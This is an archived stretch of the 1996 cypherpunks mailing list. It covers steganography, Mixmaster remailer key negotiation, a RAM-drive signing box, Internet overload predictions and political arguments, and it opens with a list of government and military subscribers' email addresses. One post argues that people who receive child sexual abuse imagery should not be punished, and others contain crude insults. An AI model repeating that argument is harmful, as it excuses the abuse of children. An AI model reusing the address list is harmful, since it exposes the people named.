-Declan // declan at eff.org // I do not represent the EFF // declan at well.com // video at nhmxw0.fnal.gov e875836 at popcorn.llnl.gov foley_p at kosmos.wcc.govt.nz cypherpunks at cheetah.llnl.gov cypherpunks at citec.qld.gov.au kwans at nii.ncb.gov.sg sklim at nii.ncb.gov.sg cypherpunks-x at nasirc.hq.nasa.gov rromine at nsf.gov peter at nii.ncb.gov.sg kfall at ee.lbl.gov timb at defcen.gov.au marty.burkhouse at ccmail.irs.gov peterb at lanl.gov cypherpunks-2localnews at mailhost.dpie.gov.au stevek at telchar.jpl.nasa.gov il1 at ornl.gov walters at snad.ncsl.nist.gov bgamble at wo0033wp.wo.blm.gov "Bruce C. Dovala" kmigoe at orion.ncsc.mil kda36 at naic.wpafb.af.mil mengertc at seoul-1sig.korea.army.mil tut at ncr.disa.mil holmesb at rl.af.mil serverb at mqg-smtp3.usmc.mil sezgin at tsk.mil.tr halland at hq.hqusareur.army.mil From jlv at signet.sig.bsh.com Sun Sep 8 15:49:51 1996 From: jlv at signet.sig.bsh.com (Jason Vagner) Date: Mon, 9 Sep 1996 06:49:51 +0800 Subject: Photoshop, Steganograhy, and cypherpunks? In-Reply-To: <199609070003.TAA11985@pentagon.io.com> Message-ID: > > 1) If I hide some PGP encrypted data in a > > gif, jpg or wav file will there be any tell tale > > signs to the naked eye of an expert? If yes, > > what are they? > > If you stego too many bits in a figure, it may become apparent. The new version of Photoshop coming out this fall includes the ability to embed "digital watermarking": (from http://www.news.com/News/Item/0,4,3188,00.html: Digital watermarking adds copyright information to a photograph that doesn't alter the photo's appearance. The watermark is detectable even after the photo is edited or printed and rescanned. Question: Will stegonagrphying (?) the picture with noise mar the watermark? Will a digital signature *and* something embedded into the graphic through steganography seriosly affect a 24-bit image? Furthermore: What about browsers? 
Could cookies or binary info be embedded into images on the fly so that a Java applet could preserve information or states between pages, of different sites? Just thoughts.. Jason Vagner From zachb at netcom.com Sun Sep 8 16:07:14 1996 From: zachb at netcom.com (Z.B.) Date: Mon, 9 Sep 1996 07:07:14 +0800 Subject: talker In-Reply-To: <199609081833.LAA07514@dns2.noc.best.net> Message-ID: On Sat, 7 Sep 1996, James A. Donald wrote: > At 12:26 PM 9/8/96 -0500, Roger Williams wrote: > > Yup -- you're never going to see a very high SNR out of Juno: > > Yes, the anarchy list has a persistent moron from Juno.com, educated > well above his intelligence. A seriously prolific loon. > > I have told Eudora to transfer everything from juno.com into my > loon file, regardless of author. Makes AOL.com look like > Caltech. I just checked www.juno.com to see what kind of system they have, and it appears that it is a free email service. No charges at all. No wonder we get so many idiots from there - free mail and they probably don't bother to verify the people they give service to, either. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From eagle at armory.com Sun Sep 8 16:12:24 1996 From: eagle at armory.com (Jeff Davis) Date: Mon, 9 Sep 1996 07:12:24 +0800 Subject: Denver Physical Cypherpunks Meeting? Message-ID: <9609081327.aa28086@deepthought.armory.com> Anyone in the front range interested in a physical meeting? Majordomo's Net Cafe at 1401 Ogden is a natural. Let me know. I'm teaching some fundamental crypto classes there next month, and it's never a bad idea to get our heads together on effecting the passage of Pro Code and SAFE. -- According to John Perry Barlow: *What is EFF?* "Jeff Davis is a truly gifted trouble-maker." *email * *** O U T L A W S On The E L E C T R O N I C F R O N T I E R **** US Out Of Cyberspace!!! Join EFF Today!
*email *

From blancw at cnw.com Sun Sep 8 16:19:05 1996
From: blancw at cnw.com (blanc)
Date: Mon, 9 Sep 1996 07:19:05 +0800
Subject: John Locke on True Names
Message-ID: <01BB9D8D.09917DA0@king1-22.cnw.com>

9. But it will be here said that, if _moral knowledge_ be placed in the contemplation of our own _moral ideas_, and those, as other modes, be of our own making, what strange notions will there be of _justice_ and _temperance_? What confusion of virtues and vices, if everyone may make what _ideas_ of them he pleases? No confusion or disorder in the things themselves, nor the reasonings about them; no more than (in mathematics) there would be a disturbance in the demonstration, or a change in the properties of figures and their relations one to another, if a man should make a triangle with four corners, or a _trapezium_ with four right angles: that is in plain _English_, change the names of the figures and call that by one name which mathematicians called ordinarily by another. For let a man make to himself the _idea_ of a figure with three angles whereof one is a right one, and call it, if he please, _equilaterum_ or _trapezium_ or anything else, the properties of and demonstrations about that _idea_ will be the same as if he called it a _rectangular-triangle_. I confess, the change of the name, by the impropriety of speech, will at first disturb him who knows not what _idea_ it stands for; but as soon as the figure is drawn, the consequences and demonstrations are plain and clear. Just the same is it in _moral knowledge_: let a man have the _idea_ of taking from others, without their consent, what their honest industry has possessed them of, and call this _justice_ if he please. He that takes the name here without the _idea_ put to it will be mistaken, by joining another _idea_ of his own to that name; but strip the _idea_ of that name or take it such as it is in the speaker's mind, and the same things will agree to it as if you called it _injustice_.
Indeed, wrong names in moral discourses breed usually more disorder, because they are not so easily rectified as in mathematics, where the figure once drawn and seen makes the name useless and of no force. For what need of a sign, when the thing signified is present and in view? But in moral names, that cannot be so easily and shortly done, because of the many decompositions that go to the making up of the complex _ideas_ of those modes. But yet for all this, the _miscalling_ of any of those _ideas_, contrary to the usual signification of the words of that language, hinders not but that we may have certain and demonstrative knowledge of their several agreements and disagreements, if we will carefully, as in mathematics, keep to the same precise _ideas_ and trace them in their several relations one to another, without being led away by their names. If we but separate the _idea_ under consideration from the sign that stands for it, our knowledge goes equally on in the discovery of real truth and certainty, whatever sounds we make use of.

~ An Essay Concerning Human Understanding
Chapter IV: Of the Reality of Knowledge

From 102540.2453 at compuserve.com Sun Sep 8 16:21:17 1996
From: 102540.2453 at compuserve.com (Blak Dayz)
Date: Mon, 9 Sep 1996 07:21:17 +0800
Subject: Kiddie porn on the Internet
Message-ID: <960908191449_102540.2453_HHV35-1@CompuServe.COM>

I believe that you have a valid p.o.v on this subject on that:

1. The Save Our Children, kill the kiddie porn, will have trouble being enforced due to the large amounts of encryption and safe IRC fserves. If they really wanted to enforce the Kill The Porn, then they should target the adults by child psychologist visits with the children during school hours.

2. The suspicion of the private organization "extortion" has valid backing in that several coincidences have occurred such as the one with Dennys. If a person would research the matter further they would come upon several cases.
*** The receivers of the porn should not be punished for the photographers action, the same as if I would complain that someone burglarized my home because I left the door open. It was their ignorance that caused their loss.

Blak Dayz of the DAS

From ravage at ssz.com Sun Sep 8 16:32:23 1996
From: ravage at ssz.com (Jim Choate)
Date: Mon, 9 Sep 1996 07:32:23 +0800
Subject: talker (fwd)
Message-ID: <199609082141.QAA03554@einstein>

Forwarded message:

> Date: Sun, 8 Sep 1996 13:23:06 -0700 (PDT)
> From: "Z.B."
> Subject: Re: talker
>
> I just checked www.juno.com to see what kind of system they have, and it appears that it is a free email service. No charges at all. No wonder we get so many idiots from there - free mail and they probably don't bother to verify the people they give service to, either.

Well we know at least one cpunk who is anti-anonymity....

Jim Choate

From blancw at cnw.com Sun Sep 8 16:38:45 1996
From: blancw at cnw.com (blanc)
Date: Mon, 9 Sep 1996 07:38:45 +0800
Subject: Encourage Singapore To Come Out Of the Stone Age
Message-ID: <01BB9D91.3EF3BB80@king1-22.cnw.com>

From: James A. Donald, in reply to Enzo Michelangeli:

> Trying to build a free society by screaming loud what the "natural" rights are supposed to be, has no better chances of success than [...]

Succeeded the last two times it was tried.

........................................................................................

But it was not merely "screaming" about what the "natural" rights ought to be - it was presenting a more definite and clear picture of them to the mind of the beholders (who hardly had any such ideas in their mind), as well as backing up the description of these rights with the intent to secure them through physical force, if necessary (as one might expect).
Screaming aloud about having "natural" rights and then sitting back and waiting for them to be recognized stands little or no chance of success with those who are obviously unsympathetic and are in a position of power over others. Knowing what one is talking about, being able to convey it with the conviction of certainty, and being prepared to act to secure what it is "rightful" to have, is more likely to achieve the noble cause. It's also more impressive (than whining).

..
Blanc

From minow at apple.com Sun Sep 8 16:50:32 1996
From: minow at apple.com (Martin Minow)
Date: Mon, 9 Sep 1996 07:50:32 +0800
Subject: Imminent Death of the Internet, GIF at 11
Message-ID:

For several months (years?) Bob Metcalf has been predicting that the Internet will self-destruct from overload. His argument appears to follow one of Gordon Bell's maxims: "anyone can predict the future: all you need is semi-log paper and a ruler." As I understand it, Metcalf's argument is that network load (messages, packets) is growing exponentially, while network bandwidth (fiber capacity, switch performance) is growing linearly. At some point, these two curves cross -- and demand will exceed capacity.

There are two solutions to this problem: either there will be a fundamental change in the way messages move on the Internet (i.e. they don't all have to pass through Mae East and/or Mae West) or there will be a fundamental change in the way we use the Internet.

We certainly are seeing changes in the way we use the network. When I "got on the net" in the late 1970's, I was on two mailing lists (SF-Lovers and Human Net) and could read *all* of Usenet traffic in an hour or two. In the late 1980's, Usenet traffic totalled about 10 MB/Day. Now, I'm on a handful of work-dependent, low bandwidth mailing lists, one high-bandwidth, high noise mailing list, almost never read Usenet and wouldn't dare attempt to support a Usenet newsserver.
Today, it takes longer for me to read mail on an office Internet or 28.8 modem at home, than it did in 1980 on a 2400 baud modem.

To make a long story short, I suspect that we will be much more selective in what we access on the net; we may hire editors (or form communities that share "interesting stuff", each person serving as one member of an informal editorial board). We will also see organizations (companies or professional societies) funding network-based publications to communicate matters of common interest. (There are a number of these already, Risks Digest being possibly the most important.)

So, in one sense, Metcalf is right; the Internet will self-destruct. However, in another sense, he is wrong; the information carried on the Internet will still be distributed, but probably in a different form.

Martin Minow
minow at apple.com

From dfloyd at io.com Sun Sep 8 17:33:21 1996
From: dfloyd at io.com (Douglas R. Floyd)
Date: Mon, 9 Sep 1996 08:33:21 +0800
Subject: What the NSA is patenting
In-Reply-To: <199609080449.AA28514@crl11.crl.com>
Message-ID: <199609082159.QAA13284@xanadu.io.com>

>
> Burning the floppy would seem to solve the problem. Lock sensitive data in RAM away from disks except for burnable floppies. I guess linux can be configured to keep sensitive data in a RAM filesystem, keeping it from being synced or flushed.
>

Currently, I am hacking up a prototype of an armored keysigning box using an old 386. This box signs/decodes incoming E-mail as long as the key switch is in the correct position. The key remains in /dev/ram0, and is encrypted, as well as stored in a .au file.

For one of the keys, I am using a hacked des program that reads a file off a floppy for the TDES key before copying the PGP key into the ramdrive.

What I plan to do is write software so that multiple floppies are needed to load the key into the RAM filesystem, and to "lock" the machine.
After the key is loaded, all network daemons are killed except smail, and all gettys are killed. This makes it hard for someone locally to get to the RAM drive. If the box is rebooted, or turned off -- bye bye RAM drive.

From zachb at netcom.com Sun Sep 8 17:34:31 1996
From: zachb at netcom.com (Z.B.)
Date: Mon, 9 Sep 1996 08:34:31 +0800
Subject: talker (fwd)
In-Reply-To: <199609082141.QAA03554@einstein>
Message-ID:

On Sun, 8 Sep 1996, Jim Choate wrote:

>
> > Date: Sun, 8 Sep 1996 13:23:06 -0700 (PDT)
> > From: "Z.B."
> > Subject: Re: talker
> >
> > I just checked www.juno.com to see what kind of system they have, and it appears that it is a free email service. No charges at all. No wonder we get so many idiots from there - free mail and they probably don't bother to verify the people they give service to, either.
>
> Well we know at least one cpunk who is anti-anonymity....
>

Pardon me, but I don't recall writing that when I wrote this message.

---
Zach Babayco
zachb at netcom.com <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127

From aba at dcs.ex.ac.uk Sun Sep 8 18:08:34 1996
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Mon, 9 Sep 1996 09:08:34 +0800
Subject: forward secrecy in mixmaster
In-Reply-To:
Message-ID: <199609081829.TAA00310@server.test.net>

Lance Cottrell writes on several lists:

> >I wrote the socket stuff yesterday evening, didn't take too long as socket programming is something I've done lots of.
> >
> >Now comes what do you actually send down the sockets.
> >
> >Question for Lance, and any others who were involved in mixmaster's implementation: what did you have in mind as a way of negotiating the DH keys?
> >
> >I notice that mixmaster generates a DH key and stores it in file `DH.mix', but that this is not (as far as I can see from the source) included in the remailer's public key block.
>
> No, it is not in the key block. It would be passed during the negotiation.
Well the first DH parameter set (in a series of re-keyed DH parameters) could just as easily go in the public key block.

If you were not doing rekeying, it would make sense to put the public DH parameters in the key block, as it would remove the need to negotiate these parameters, and simplify the protocol.

As you're doing rekeying, putting the parameters in the public key block makes a less orthogonal protocol, adds nothing, and has the negative effect of breaking compatibility with previous public key blocks.

In short for a rekeying protocol I agree :-)

> >[bigger keys!]
>
> Call me paranoid. After asking and reading around I decided I wanted to cover my bases. It looked like, in the future, it might be easier to break with small generators.

Fair enough.

> This is not a critical decision though. I too would have liked it longer, but using RSAREF I am limited.

I suspected RSA's weird license might be the problem. (Given the situation with PGP 2.x, I presume that the license does not permit you to increase the max arithmetic precision.)

> That is one of the reasons I have each remailer create its own DH modulus, and allow it to change it periodically.

Each remailer with its own prime doesn't buy you a whole lot of entropy because there aren't many mixmaster remailers, 4 bits currently?. The entropy from having rekeying every day instead of say every year, another 9 bits, 13 bits tops? I'm not sure what the precise entropy increase is from going to 1024 to 4096, but it's got to be many orders of magnitude better than 13 bits.

I'd say junk RSAREF for the DH operations, use one of the other libs. (You can do this for DH, without violating patents, right? But not for RSA, so I guess if you care about the patent/license agreement mess, you've got to use RSAREF for RSA signatures at least).

Or maybe you could just wait for PGP 3.0 which uses El Gamal, for sigs and pk encryption, and presumably will have less restrictive key sizes.
So as well as having bigger signing keys, for the sake of paranoia (it's contagious), as you were saying, I guess you may gain some security by not having a common modulus, and making the protocol allow re-keying.

If you used a different password for RSA and DH keys, and your machine is compromised, you can sign a new DH key with RSA, and use El Gamal signatures with the DH key normally. How's that for paranoid :-)

(Or another temporary RSA key, and RSA sigs, rather than El Gamal sigs, whatever. You sign by proxy, that is the receiver mixmaster gets the temporary key signed by the long term RSA key, checks the signature on the temporary key, and then checks the signature made by the temporary key on the object in question).

Greatly reduces the risk of having the password in the binary. You'd need to manually type the RSA key's password to rekey, or if you were real paranoid, you could keep the RSA key on your laptop, and copy the new signed DH public key on to the remailer. Do this once a month, or as often as you wish.

This is a similar approach to that taken by people who have a huge signing only PGP key, which they are careful to keep only on machines they physically control, and have smaller keys which they use on multi-user systems.

This also formalizes the situation where remailers have been compromised, or suffered disk crashes. The operator says, "sorry folks new type2 key for mixmaster at xyz.org", and if you're lucky signs his post, and also his post of the original key, so that you know it's not a hijacker, and if you're even more lucky, the user was around when the first post was made, or searches through the archives for it, and checks that the sigs show a persistent identity for the operator.

An improvement right?

The remailers keep both their signing keys, and their temporary signing keys available by request, the signing key should not change through the remailer's life-time.
> >A common modulus may offer a fatter target for attack (for some precomputation attacks), but with large enough keys this probably isn't that bad, as there aren't that many mixmasters anyway.
> >
> >With a common modulus there is DH key negotiation needed, just include it with the source.
>
> You have spelled out why I like having each remailer use its own modulus.

yeah, ok, I agree no common modulus. And rekeying.

> >a) include the DH key signed by the RSA key in the remailers public key
> >   (may break backwards compatibility with existing versions of
> >   mixmaster)
> >
> >b) send the DH public key at the start of each session
> >
> >c) send the DH public key on request
>
> I chose C. In the protocol I developed the sending remailer (A) sends a hash of the DH modulus to the receiving remailer (B). If B has it, they use it. If not, A sends it. I use the modulus from A because it has the stake in privacy. B will take messages from anyone, but A wants to know the messages it has go to the correct other remailer B.

sounds fine.

Also, you might want to migrate to SHA1 in place of MD5, at some point. Or to one of those megahashes like SHA1(MD5(x))||MD5(SHA1(x))

Also mixmaster has capabilities like type 1 remailers right? If so you would presumably add a capability indicating that the remailer supports direct socket delivery. And another capability for forward secrecy (the other thread "non-interactive forward secrecy" discusses ways to retro-fit a less interactive forward secrecy mechanism into email delivered mixmaster packets).

The socket capability presumably would be useful to know that it is likely to react more quickly. Forward secrecy is obviously nice to know about for other reasons.
Adam
--
#!/bin/perl -sp0777i
Message-ID: <9609082254.AA26712@etna.ai.mit.edu>

>Either that, or the fear that authorities are no longer necessary unless they can point to something dangerous that they're protecting the rest of us from - with the plausibility of the Godless Communist Threat waning, it becomes necessary for drug sellers and people with fringe politics to appear more threatening.

I don't think the same case can be made for the drug sellers and militias providing a political justification for the military industrial complex in the same way the USSR did. It is true that the USSR was always a more credible threat to hawks in the pentagon than to people who analysed the situation, many of whom realised that the USSR was facing a terminal crisis before Afghanistan. Even so I don't think that the drug or militia threat could ever be hyped to a level which would justify huge subsidies to Boeing, McDonnell-Douglas, Raytheon etc.

>Can you imagine the military spontaneously downsizing, or failing to oppose reductions in force?

It's interesting that none of the candidates in the current election are willing to address the question of whether the US really needs to maintain the military budget at its cold war levels even after the alleged threat has collapsed. Indeed the Republicans are suggesting spending several billion on building an anti-ballistic missile system when none of the alleged "threats" has a ballistic missile with appropriate range in the first place. The likely nuclear scenario is for someone to smuggle a bomb in in a truck.

>While domestic terrorist events may bring a sharper focus to discussions of the merits and costs of politically motivated violence, your fantasy that it will somehow bring about a change in someone's substantive politics is amusing.

US contributions to NORAID dropped by a half in the wake of the Lockerbie incident.
It's difficult to make any conclusions about the current drop in funding since they might be due to the peace process, domestic terrorism or both.

>Further, your notion that "terrorism" has somehow been limited to "far-off irredentist struggles" of concern only to expatriates is ridiculous. Have you not noticed the arson, bombings, and shootings at abortion clinics in the US? Or the history of violence on the (neo-) left, e.g., the Weather Underground, etc.? Or the history of the KKK and race-motivated lynchings/beatings? Or the Unabomber?

With the possible exception of the activities of the KKK I don't think you make your case. The KKK explicitly pursued a strategy of terror to create a political effect through intimidation. The Unabomber was probably just a crank for whom the political ideology was merely an excuse to indulge in psychopathic behaviour, in the absence of a political motive another would have been found. While this supports my general comment that terrorism in general is caused by psychopaths rather than people with legitimate grievances I don't think that the Unabomber fits the normal profile. He was a single individual, not a group.

>Isn't it wonderful that "one" unavoidably "reaches conclusions" which eliminate moral and political arguments you find uninteresting?

I don't find the arguments themselves uninteresting. I just find the mode of argument superficial. If people are arguing in terms of "rights" but cannot justify why something is a "right" then they are simply promoting their conclusions to axioms, its begging the question. The argument is uninteresting because it is not an argument, it is merely a restatement of the original claim. Arguing the right to bear arms on the basis of the right to bear arms is not an interesting "argument".

>Boy, if we could just figure out the right combination of procedural rules, we could simply abandon all of this problematic "rights" stuff. Wouldn't that be a lot simpler?
>These pesky "rights" keep getting in the way of legitimate government needs. Shit.

If you read Mill's "On Liberty" you will find that he is very clear that rights are the consequence of a social/governmental process and that it is not possible to talk of "rights" outside the context of laws.

The difficult philosophical question of "rights" is recognising when there is a conflict between rights and deciding which right to favour over another. I assert that every child has a right to food, shelter and education, I do so by recourse to a Utilitarian argument but I could equally well ground my argument in terms of Contractarianism or use a Kantian argument. Now if you assert that the right of the individual to opt out of society and not pay taxes is paramount this creates a problem, how is the conflict between the right I propose and the right you propose resolved?

>Don't forget that it's necessary to adopt an exaggerated version of your own position, such that you can "compromise" your way to "agreeing" on exactly what you wanted in the first place.

No, that is not necessarily the case. It is usually useful to set out a bargaining position that is maximalist and to avoid being more reasonable than the opposition. But to stake out a completely extreme position means that the conclusion may be reached that agreement is not possible at all and that consequently there is no purpose in negotiation.

In order for the pro/anti-abortion camps to become entrenched in the political process in the manner they have it was necessary for the anti-abortion people to deliver the Republican party a block vote of about 2 million voters through the Christian Coalition. It's only possible to take an absolutist position if you can deliver a well defined voting block. The Internet cannot currently deliver such a vote.
Phill

From jya at pipeline.com Sun Sep 8 18:50:55 1996
From: jya at pipeline.com (John Young)
Date: Mon, 9 Sep 1996 09:50:55 +0800
Subject: Cypherpunks subscribers - Singapore and NZ gvts, plus IRS
Message-ID: <199609082254.WAA04422@pipe3.t1.usa.pipeline.com>

Tim May, among others, often reminds that the list is wide open to all comers, from whatever domain. I'm happy to see the diverse range of domains, especially those I snoop for good alt.sex.bestiality pix, er, classified data. The sg, gov and mil sites offer best of show sexual defectives. Beloved IRS is still a bit touchy about snooping its vast sewer of exon-oddities, though, so don't leave a mess when you've finished ogling Tim's.

From Adamsc at io-online.com Sun Sep 8 18:53:37 1996
From: Adamsc at io-online.com (Adamsc)
Date: Mon, 9 Sep 1996 09:53:37 +0800
Subject: Photoshop, Steganograhy, and cypherpunks?
Message-ID: <19960908233159843.AAA224@IO-ONLINE.COM>

On Sun, 8 Sep 1996 16:16:58 -0400 (EDT), Jason Vagner wrote:

>> > 1) If I hide some PGP encrypted data in a gif, jpg or wav file will there be any tell tale signs to the naked eye of an expert? If yes, what are they?
>> If you stego too many bits in a figure, it may become apparent.
>The new version of Photoshop coming out this fall includes the ability to embed "digital watermarking":
>(from http://www.news.com/News/Item/0,4,3188,00.html:
>
> Digital watermarking adds copyright information to a photograph that doesn't alter the photo's appearance. The watermark is detectable even after the photo is edited or printed and rescanned.
>
>Question: Will stegonagrphying (?) the picture with noise mar the watermark? Will a digital signature *and* something embedded into the graphic through steganography seriously affect a 24-bit image?

Most certainly; the idea here is that watermarking should show that an image is unedited.

>Furthermore: What about browsers?
>Could cookies or binary info be embedded into images on the fly so that a java applet could preserve information or states between pages, of different sites?

Of course. You could do a cookie type implementation with a Java applet easily.

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre

From Adamsc at io-online.com Sun Sep 8 19:18:34 1996
From: Adamsc at io-online.com (Adamsc)
Date: Mon, 9 Sep 1996 10:18:34 +0800
Subject: talker
Message-ID: <19960908232620265.AAA85@IO-ONLINE.COM>

On Sat, 07 Sep 1996 20:10:50 -0700, James A. Donald wrote:

>> Yup -- you're never going to see a very high SNR out of Juno:
>
>Yes, the anarchy list has a persistent moron from Juno.com, educated well above his intelligence. A seriously prolific loon.
>
>I have told eudora to transfer everything from juno.com into my loon file, regardless of author. Makes AOL.com look like caltech.

Particularly since AOL tends to get a lot of well-educated people who are just net-illiterate. Of course, they also get a bunch of cranks, particularly since those "Generate an AOL account" programs started going around...

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre

From Adamsc at io-online.com Sun Sep 8 19:23:50 1996
From: Adamsc at io-online.com (Adamsc)
Date: Mon, 9 Sep 1996 10:23:50 +0800
Subject: talker
Message-ID: <19960908232414750.AAA81@IO-ONLINE.COM>

On Sun, 08 Sep 1996 11:09:07 -0400, Wayne H.
Allen wrote:

>> cypherpunks are *not* crackers; this is a cryptographic and political issues relating to cryptography mailing list.
> Well maybe, political issues galore certainly, but very very little to do with cryptography. I mean what does TWA 800 have to do with this list. I mean let's be completely honest here, whatever the original purpose of the list was for it's been allowed to shift away from its intended purpose considerably.

True, but something like TWA800 has a lot more relevance to the "political issues" part mentioned above. A Big-Brother database being set up seems on-topic...

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre

From abostick at netcom.com Sun Sep 8 19:26:01 1996
From: abostick at netcom.com (Alan Bostick)
Date: Mon, 9 Sep 1996 10:26:01 +0800
Subject: [NOISE] Far-reaching tentacles . . . ?
Message-ID: <199609082338.QAA18544@netcom19.netcom.com>

Found in the news:

(SACRAMENTO)- The principals of six Sacramento area schools have received 46 used computers that were renovated by inmates at Folsom Prison. Warden Theo White delivered the machines after they were given a reprieve from the scrap heap. The prison obtained the donated personal computers from the non-profit Detwiler Foundation... which began working five years ago to bring new technology into the state's classrooms.

[Would you want *YOUR* CHILDREN to use computers that had been HACKED by CONVICTED CRIMINALS????]

--
Alan Bostick | Usenet is living proof that if you analyze a
mailto:abostick at netcom.com | blackbody spectrum for semantic content you get
news:alt.grelb | "Call 1-800-HOT-GIRL now!"
http://www.alumni.caltech.edu/~abostick

From sasha1 at netcom.com Sun Sep 8 19:31:22 1996
From: sasha1 at netcom.com (Alexander 'Sasha' Chislenko)
Date: Mon, 9 Sep 1996 10:31:22 +0800
Subject: Imminent Death of the Internet, GIF at 11
Message-ID: <2.2.32.19960908231147.0129c1fc@netcom.com>

At 10:40 AM 9/7/96 -0700, Martin Minow wrote:

>For several months (years?) Bob Metcalf has been predicting that the Internet will self-destruct from overload. His argument appears to follow one of Gordon Bell's maxims: "anyone can predict the future: all you need is semi-log paper and a ruler." As I understand it, Metcalf's argument is that network load (messages, packets) is growing exponentially, while network bandwidth (fiber capacity, switch performance) is growing linearly. At some point, these two curves cross -- and demand will exceed capacity.
>

I would add one word into that Gordon Bell's maxim: "anyone can predict the SHORT-TERM future: all you need is semi-log paper and a ruler."

Rulers are linear-extrapolation predictors; the only predictions with still lower intelligence are pointers - with the assumption that things are going to always remain the same. Unfortunately, these two kinds of prediction methods populate most of the human "visionary" landscape, with rare flowers of visionary minds elevating above it - Metcalf's doesn't seem to be one of them.

This very observation on the population/food dilemma was made by Malthus quite a while ago. However, both population and food are still here, and natural resources are no longer a serious limiting factor for the production of food.

If you notice that your attempt to extend your ruler farther than it can go, will not work, it's a good prediction of a breakdown - *of the ruler*, not the system you are trying to measure.
The role of a visionary is not to mistake the horizon of current trends for the horizon of the world, but look ahead and predict future trends - and advise what should be done to adapt to the imminent transitions.

An important observation for the net traffic/bandwidth "crisis" is that human ability to perceive textual and visual information remains pretty much the same. Addition of graphics, video and sound to the Net, as well as the growing number of users, increase the bandwidth, but this all has (though still distant) saturation point - say, 24 hour-a-day single-channel video feed to every human and his dog. (Inter-machine communications do not have this limit though).

Already, most of the newsfeed coming to any single server, is never read by anybody; this is also the fate of most messages from 60 or so mailing lists coming to my PC. A solution here, that will be also quite instrumental for many future problems, is not to send messages that are not going to be read - i.e., server-side filtering agents; I have been suggesting collaborative message filtering (see proposal on my home page) for more than 5 years now - only to find people who could help implement it, uselessly running around the Net whining and waving their stiff rulers.

Of course, there are also other methods of making Net traffic more intelligent and robust; if Internet was recognized as the most revolutionary development in the evolution of the global ecology of intelligence, and if there existed some mechanism for turning truly visionary ideas on the Net's evolution into changes in its structure, then, well, things would be much better.
----------------------------------------------------------------------------
Alexander Chislenko < www.lucifer.com/~sasha/home.html
Firefly Network, Inc.: < www.ffly.com
----------------------------------------------------------------------------

From scrappo.reverb at juno.com Sun Sep 8 19:33:59 1996
From: scrappo.reverb at juno.com (A L)
Date: Mon, 9 Sep 1996 10:33:59 +0800
Subject: 9yrold
In-Reply-To: <19960908.125436.3318.0.Doom13@juno.com>
Message-ID: <19960908.165602.4527.1.scrappo.reverb@juno.com>

On Sun, 08 Sep 1996 14:44:40 EDT doom13 at juno.com (Floyd W Odom) writes:
>Does anyone out there know any kids mailing lists, because my little
>brother Richard just joined and he doesn't have anything to mail to
>he's only 9 years old.
>
>
>
>floyd odom

This message has nothing to do with the subject of this mailing list, which is as stated in the Information File which you should have read, Encryption and other related issues. Your actions have been a nuisance, and you should cease your message writing endeavor. In regards to your message, have him write messages to you stating how he thinks you should stop writing to him, and how he doesn't need e-mail anyways.

~~~~~~~~~~~~~~~~~~~~
s/n ratio has been raised. Keep a tab on it.

From webeus at sprynet.com Sun Sep 8 19:40:32 1996
From: webeus at sprynet.com (Webeus)
Date: Mon, 9 Sep 1996 10:40:32 +0800
Subject: Mailing list
Message-ID: <323357CF.28F0@sprynet.com>

Hello,

I have been away for over 2 months and in returning find that alpha.c2.org is no longer. Can you suggest an alternative, FAQ's etc ??

Thank you
Webeus

From wombat at mcfeely.bsfs.org Sun Sep 8 19:51:54 1996
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Mon, 9 Sep 1996 10:51:54 +0800
Subject: talker
In-Reply-To:
Message-ID:

Complaints about spamming and cross-posting probably won't get you far, either. On-Net spamvertizing seems to be their source of revenue. Perhaps shaw.net needs to be contacted instead.
It's either that, or give Floyd and Richard a nickel to go watch batman instead of playing with the computer.

- r.w.

On Sun, 8 Sep 1996, Z.B. wrote:

> On Sat, 7 Sep 1996, James A. Donald wrote:
>
> > At 12:26 PM 9/8/96 -0500, Roger Williams wrote:
> > > Yup -- you're never going to see a very high SNR out of Juno:
> >
> > Yes, the anarchy list has a persistent moron from Juno.com, educated
> > well above his intelligence. A seriously prolific loon.
> >
> > I have told eudora to transfer everything from juno.com into my
> > loon file, regardless of author. Makes AOL.com look like
> > caltech.
>
> I just checked www.juno.com to see what kind of system they have, and it
> appears that it is a free email service. No charges at all. No wonder
> we get so many idiots from there - free mail and they probably don't
> bother to verify the people they give service to, either.
>
>
> ---
>
> Zach Babayco
>
> zachb at netcom.com <----- finger for PGP public key
> http://www.geocities.com/SiliconValley/Park/4127
>

From frogfarm at yakko.cs.wmich.edu Sun Sep 8 19:52:44 1996
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Mon, 9 Sep 1996 10:52:44 +0800
Subject: Court challenge to AOL junk-mail blocks
In-Reply-To:
Message-ID: <199609082348.TAA04495@yakko.cs.wmich.edu>

>
> The judge did mention "status quo" in his opinion. I would hope that
> "status quo" would mean the ability of ISPs to offer and enforce whatever
> contracts they want -- including banning incoming spam -- without the
> intervention of the government. Unless, of course, the ISP breaks the
> contract, but in that case the plaintiffs should be the customers, not
> the spammer.

Aren't spammers customers, by definition? If so, they have just as much right to bring suit as any other customer. Less moral justification, yes, but an equal standing in the law's eyes.
--
I let go of the law, and people become honest / I let go of economics, and
people become prosperous / I let go of religion, and people become serene /
I let go of all desire for the common good, and the good becomes common as
grass. .oOo. [Tao Te Ching, Chapter 57, Stephen Mitchell translation]

From jf_avon at citenet.net Sun Sep 8 19:58:46 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Mon, 9 Sep 1996 10:58:46 +0800
Subject: [PARANOID NOISE] Satellites flying formation?
Message-ID: <9609082355.AA11764@cti02.citenet.net>

On 8 Sep 96 at 12:16, John F. Fricker wrote:

